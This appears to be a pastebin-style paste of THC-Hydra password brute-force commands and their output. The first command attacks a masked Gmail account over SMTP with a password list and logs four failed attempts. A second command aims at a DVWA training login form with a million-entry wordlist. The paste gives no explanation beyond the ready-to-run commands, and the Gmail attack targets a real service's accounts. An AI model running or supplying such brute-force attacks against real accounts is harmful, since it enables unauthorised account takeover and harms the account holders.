· 7 years ago · Jan 29, 2019, 07:50 AM
1hydra -l ********@gmail.com -P passwords.txt -s 465 -S -v -V -t 4 smtp.gmail.com smtp
2
3Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
4
5Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-10 16:21:32
6[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
7[WARNING] Google Mail has bruteforce detection and sends false positives. You are not doing anything illegal right?!
8[DATA] max 4 tasks per 1 server, overall 64 tasks, 4 login tries (l:1/p:4), ~0 tries per task
9[DATA] attacking service smtp on port 465 with SSL
10[VERBOSE] Resolving addresses ... done
11[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "aaaa" - 1 of 4 [child 0]
12[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "*******************" - 2 of 4 [child 1]
13[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "jkjh" - 3 of 4 [child 2]
14[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "" - 4 of 4 [child 3]
15[VERBOSE] using SMTP LOGIN AUTH mechanism
16[VERBOSE] using SMTP LOGIN AUTH mechanism
17[VERBOSE] using SMTP LOGIN AUTH mechanism
18[VERBOSE] using SMTP LOGIN AUTH mechanism
19[STATUS] attack finished for smtp.gmail.com (waiting for children to complete tests)
201 of 1 target completed, 0 valid passwords found
21Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-10 16:21:33
22
23hydra 192.168.88.4 -l admin -P C:HydraListPasswords10_million_password_list_top_1000000.txt http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=Paste ID here"